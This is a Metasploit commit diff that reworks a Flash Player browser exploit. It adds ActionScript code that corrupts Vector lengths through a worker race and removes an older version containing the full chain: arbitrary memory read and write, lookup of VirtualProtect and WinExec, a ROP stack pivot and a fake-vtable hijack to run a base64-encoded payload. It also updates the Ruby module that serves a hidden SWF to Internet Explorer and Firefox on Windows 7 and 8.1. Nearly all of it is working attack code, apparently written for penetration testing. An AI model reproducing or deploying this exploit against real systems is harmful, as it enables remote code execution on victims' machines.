Update to use the new flash Exploiter
This commit is contained in:
jvazquez-r7
parent
8dad739c76
commit
6c7ee10520
Binary file not shown.
|
|
@ -0,0 +1,123 @@
|
|||
// Build how to:
|
||||
// 1. Download the AIRSDK, and use its compiler.
|
||||
// 2. Be support to support 16.0 as target-player (flex-config.xml).
|
||||
// 3. Download the Flex SDK (4.6)
|
||||
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
|
||||
// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
|
||||
// 5. Build with: mxmlc -o msf.swf Msf.as
|
||||
|
||||
// Original code by @hdarwin89 modified to be used from msf
|
||||
// https://git.hacklab.kr/snippets/13
|
||||
// http://pastebin.com/Wj3NViUu
|
||||
|
||||
package
|
||||
{
|
||||
import flash.display.Sprite
|
||||
import flash.events.Event
|
||||
import flash.utils.ByteArray
|
||||
import flash.system.Worker
|
||||
import flash.system.WorkerDomain
|
||||
import flash.system.MessageChannel
|
||||
import flash.system.ApplicationDomain
|
||||
import avm2.intrinsics.memory.casi32
|
||||
import flash.display.LoaderInfo
|
||||
import mx.utils.Base64Decoder
|
||||
|
||||
public class Exploit extends Sprite
|
||||
{
|
||||
private var ov:Vector.<Object> = new Vector.<Object>(25600)
|
||||
private var uv:Vector.<uint> = new Vector.<uint>
|
||||
private var ba:ByteArray = new ByteArray()
|
||||
private var b64:Base64Decoder = new Base64Decoder()
|
||||
private var worker:Worker
|
||||
private var mc:MessageChannel
|
||||
private var payload:ByteArray
|
||||
private var platform:String
|
||||
private var os:String
|
||||
private var exploiter:Exploiter
|
||||
|
||||
public function Exploit()
|
||||
{
|
||||
if (Worker.current.isPrimordial) mainThread()
|
||||
else workerThread()
|
||||
}
|
||||
|
||||
private function mainThread():void
|
||||
{
|
||||
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
|
||||
os = LoaderInfo(this.root.loaderInfo).parameters.os
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray()
|
||||
|
||||
ba.length = 0x1000
|
||||
ba.shareable = true
|
||||
for (var i:uint = 0; i < ov.length; i++) {
|
||||
ov[i] = new Vector.<uint>(1014)
|
||||
ov[i][0] = 0xdeedbeef
|
||||
}
|
||||
for (i = 0; i < ov.length; i += 2) delete(ov[i])
|
||||
worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
|
||||
mc = worker.createMessageChannel(Worker.current)
|
||||
mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
|
||||
worker.setSharedProperty("mc", mc)
|
||||
worker.setSharedProperty("ba", ba)
|
||||
ApplicationDomain.currentDomain.domainMemory = ba
|
||||
worker.start()
|
||||
}
|
||||
|
||||
private function workerThread():void
|
||||
{
|
||||
var ba:ByteArray = Worker.current.getSharedProperty("ba")
|
||||
var mc:MessageChannel = Worker.current.getSharedProperty("mc")
|
||||
var tmp:ByteArray = new ByteArray()
|
||||
tmp.length = 0x2000
|
||||
|
||||
for (var i:uint = 0; i < 20; i++) {
|
||||
new Vector.<uint>(1022)
|
||||
}
|
||||
|
||||
ba.writeBytes(tmp)
|
||||
ov[0] = new Vector.<uint>(1022)
|
||||
|
||||
mc.send("")
|
||||
while (mc.messageAvailable);
|
||||
|
||||
for (i = 0;; i++) {
|
||||
if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
|
||||
ov[0][i] = 0xffffffff
|
||||
break
|
||||
}
|
||||
}
|
||||
ov[0][0xfffffffe] = 1014
|
||||
|
||||
mc.send("")
|
||||
}
|
||||
|
||||
private function onMessage(e:Event):void
|
||||
{
|
||||
var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
|
||||
Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
|
||||
if (mod == 1022) mc.receive()
|
||||
else {
|
||||
for (var i:uint = 0; i < ov.length; i++) {
|
||||
if (ov[i].length == 0xffffffff) {
|
||||
uv = ov[i]
|
||||
} else {
|
||||
if (ov[i] != null) {
|
||||
delete(ov[i])
|
||||
ov[i] = null
|
||||
}
|
||||
}
|
||||
}
|
||||
if (uv == null) {
|
||||
Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
|
||||
return
|
||||
}
|
||||
exploiter = new Exploiter(this, platform, os, payload, uv)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -1,264 +0,0 @@
|
|||
// Build how to:
|
||||
// 1. Download the AIRSDK, and use its compiler.
|
||||
// 2. Be support to support 16.0 as target-player (flex-config.xml).
|
||||
// 3. Download the Flex SDK (4.6)
|
||||
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
|
||||
// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
|
||||
// 5. Build with: mxmlc -o msf.swf Msf.as
|
||||
|
||||
// Original code by @hdarwin89 modified to be used from msf
|
||||
// https://git.hacklab.kr/snippets/13
|
||||
// http://pastebin.com/Wj3NViUu
|
||||
|
||||
package
|
||||
{
|
||||
import flash.display.Sprite
|
||||
import flash.events.Event
|
||||
import flash.utils.ByteArray
|
||||
import flash.system.Worker
|
||||
import flash.system.WorkerDomain
|
||||
import flash.system.MessageChannel
|
||||
import flash.system.ApplicationDomain
|
||||
import avm2.intrinsics.memory.casi32
|
||||
import flash.display.LoaderInfo
|
||||
import mx.utils.Base64Decoder
|
||||
|
||||
public class Msf extends Sprite
|
||||
{
|
||||
private var ov:Vector.<Object> = new Vector.<Object>(25600)
|
||||
private var uv:Vector.<uint> = new Vector.<uint>
|
||||
private var ba:ByteArray = new ByteArray()
|
||||
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
|
||||
private var b64:Base64Decoder = new Base64Decoder()
|
||||
private var payload:String = ""
|
||||
private var worker:Worker
|
||||
private var mc:MessageChannel
|
||||
|
||||
public function Msf()
|
||||
{
|
||||
if (Worker.current.isPrimordial) mainThread()
|
||||
else workerThread()
|
||||
}
|
||||
|
||||
private function mainThread():void
|
||||
{
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray().toString()
|
||||
ba.length = 0x1000
|
||||
ba.shareable = true
|
||||
for (var i:uint = 0; i < ov.length; i++) {
|
||||
ov[i] = new Vector.<Object>(1014)
|
||||
ov[i][0] = ba
|
||||
ov[i][1] = this
|
||||
ov[i][2] = stack
|
||||
ov[i][3] = payload_space
|
||||
}
|
||||
for (i = 0; i < ov.length; i += 2) delete(ov[i])
|
||||
worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
|
||||
mc = worker.createMessageChannel(Worker.current)
|
||||
mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
|
||||
worker.setSharedProperty("mc", mc)
|
||||
worker.setSharedProperty("ba", ba)
|
||||
ApplicationDomain.currentDomain.domainMemory = ba
|
||||
worker.start()
|
||||
}
|
||||
|
||||
private function workerThread():void
|
||||
{
|
||||
var ba:ByteArray = Worker.current.getSharedProperty("ba")
|
||||
var mc:MessageChannel = Worker.current.getSharedProperty("mc")
|
||||
var tmp:ByteArray = new ByteArray()
|
||||
tmp.length = 0x2000
|
||||
|
||||
for (var i:uint = 0; i < 20; i++) {
|
||||
new Vector.<uint>(1022)
|
||||
}
|
||||
|
||||
ba.writeBytes(tmp)
|
||||
ov[0] = new Vector.<uint>(1022)
|
||||
|
||||
mc.send("")
|
||||
while (mc.messageAvailable);
|
||||
|
||||
// Vector length corruption didn't work, aborting...
|
||||
if (ov[0].length != 0xffffffff) {
|
||||
return
|
||||
}
|
||||
|
||||
// Bad memory layout :( restoring length, and aborting...
|
||||
if (ov[0][0x407] != 0x3f6) {
|
||||
ov[0][0x3ffffffe] = 1022
|
||||
return
|
||||
}
|
||||
|
||||
ov[0][0] = ov[0][0x403] - 0x18 - 0x1000
|
||||
var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) //+ 0x100000
|
||||
var main:uint = ov[0][0x409] - 1
|
||||
var stack_object:uint = ov[0][0x40a] - 1
|
||||
var payload_space_object:uint = ov[0][0x40b] - 1
|
||||
var vtable:uint = vector_read(main)
|
||||
var stack_address:uint = vector_read(stack_object + 0x18) as uint
|
||||
var payload_address:uint = vector_read(payload_space_object + 0x18) as uint
|
||||
vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8)
|
||||
vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff)
|
||||
mc.send(buffer.toString() + "/" + main.toString() + "/" + vtable.toString() + "/" + stack_address.toString() + "/" + payload_address.toString())
|
||||
}
|
||||
|
||||
private function onMessage(e:Event):void
|
||||
{
|
||||
casi32(0, 1022, 0xFFFFFFFF)
|
||||
if (ba.length != 0xffffffff) mc.receive()
|
||||
else {
|
||||
// Restoring vector length
|
||||
var res:uint = casi32(0, 0xffffffff, 1022)
|
||||
if (res != 0xffffffff) { // Something has been wrong... aborting
|
||||
return
|
||||
}
|
||||
ba.endian = "littleEndian"
|
||||
var data:Array = (mc.receive() as String).split("/")
|
||||
var buffer:uint = parseInt(data[0]) as uint
|
||||
var main:uint = parseInt(data[1]) as uint
|
||||
var vtable:uint = parseInt(data[2]) as uint
|
||||
var stack_address:uint = parseInt(data[3]) as uint
|
||||
var payload_address:uint = parseInt(data[4]) as uint
|
||||
var flash:uint = base(vtable)
|
||||
var winmm:uint = module("winmm.dll", flash)
|
||||
var kernel32:uint = module("kernel32.dll", winmm)
|
||||
var virtualprotect:uint = procedure("VirtualProtect", kernel32)
|
||||
var winexec:uint = procedure("WinExec", kernel32)
|
||||
var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
|
||||
var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
|
||||
|
||||
// Continuation of execution
|
||||
byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
|
||||
byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
|
||||
byte_write(0, "\x89\x03", false) // mov [ebx], eax
|
||||
byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
|
||||
|
||||
// Put the payload (command) in memory
|
||||
byte_write(payload_address + 8, payload, true); // payload
|
||||
|
||||
// Put the fake vtabe / stack on memory
|
||||
byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
|
||||
byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
|
||||
byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
|
||||
byte_write(0, virtualprotect)
|
||||
|
||||
// VirtualProtect
|
||||
byte_write(0, winexec)
|
||||
byte_write(0, buffer + 0x10)
|
||||
byte_write(0, 0x1000)
|
||||
byte_write(0, 0x40)
|
||||
byte_write(0, buffer + 0x8) // Writable address (4 bytes)
|
||||
|
||||
// WinExec
|
||||
byte_write(0, buffer + 0x10)
|
||||
byte_write(0, payload_address + 8)
|
||||
byte_write(0)
|
||||
|
||||
byte_write(main, stack_address + 0x18000) // overwrite with fake vtable
|
||||
|
||||
toString() // call method in the fake vtable
|
||||
}
|
||||
}
|
||||
|
||||
private function vector_write(addr:uint, value:uint = 0):void
|
||||
{
|
||||
var pos:uint = 0
|
||||
|
||||
if (addr > ov[0][0]) {
|
||||
pos = ((addr - ov[0][0]) / 4) - 2
|
||||
} else {
|
||||
pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1
|
||||
}
|
||||
|
||||
ov[0][pos] = value
|
||||
}
|
||||
|
||||
private function vector_read(addr:uint):uint
|
||||
{
|
||||
var pos:uint = 0
|
||||
|
||||
if (addr > ov[0][0]) {
|
||||
pos = ((addr - ov[0][0]) / 4) - 2
|
||||
} else {
|
||||
pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1
|
||||
}
|
||||
|
||||
return ov[0][pos]
|
||||
}
|
||||
|
||||
private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
|
||||
{
|
||||
if (addr) ba.position = addr
|
||||
if (value is String) {
|
||||
for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
|
||||
if (zero) ba.writeByte(0)
|
||||
} else ba.writeUnsignedInt(value)
|
||||
}
|
||||
|
||||
private function byte_read(addr:uint, type:String = "dword"):uint
|
||||
{
|
||||
ba.position = addr
|
||||
switch(type) {
|
||||
case "dword":
|
||||
return ba.readUnsignedInt()
|
||||
case "word":
|
||||
return ba.readUnsignedShort()
|
||||
case "byte":
|
||||
return ba.readUnsignedByte()
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
private function base(addr:uint):uint
|
||||
{
|
||||
addr &= 0xffff0000
|
||||
while (true) {
|
||||
if (byte_read(addr) == 0x00905a4d) return addr
|
||||
addr -= 0x10000
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
private function module(name:String, addr:uint):uint
|
||||
{
|
||||
var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
|
||||
while (true) {
|
||||
var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
|
||||
if (!entry) throw new Error("FAIL!");
|
||||
ba.position = addr + entry
|
||||
if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
|
||||
}
|
||||
return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
|
||||
}
|
||||
|
||||
private function procedure(name:String, addr:uint):uint
|
||||
{
|
||||
var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
|
||||
var numberOfNames:uint = byte_read(eat + 0x18)
|
||||
var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
|
||||
var addressOfNames:uint = addr + byte_read(eat + 0x20)
|
||||
var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
|
||||
for (var i:uint = 0; ; i++) {
|
||||
var entry:uint = byte_read(addressOfNames + i * 4)
|
||||
ba.position = addr + entry
|
||||
if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
|
||||
}
|
||||
return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
|
||||
}
|
||||
|
||||
private function gadget(gadget:String, hint:uint, addr:uint):uint
|
||||
{
|
||||
var find:uint = 0
|
||||
var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
|
||||
var value:uint = parseInt(gadget, 16)
|
||||
for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
|
||||
return addr + i
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -6,9 +6,8 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
|
|
@ -48,8 +47,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:os_name => OperatingSystems::Match::WINDOWS_7,
|
||||
:ua_name => Msf::HttpClients::IE,
|
||||
:os_name => lambda do |os|
|
||||
os =~ OperatingSystems::Match::WINDOWS_7 ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_81
|
||||
end,
|
||||
:ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
|
||||
:flash => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
|
||||
:arch => ARCH_X86
|
||||
},
|
||||
|
|
@ -83,17 +85,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit_template(cli, target_info)
|
||||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
|
||||
b64_payload = Rex::Text.encode_base64(psh_payload)
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
platform_id = 'win'
|
||||
os_name = target_info[:os_name]
|
||||
|
||||
html_template = %Q|<html>
|
||||
<body>
|
||||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||
<param name="movie" value="<%=swf_random%>" />
|
||||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
|
|
|||
Loading…
Reference in New Issue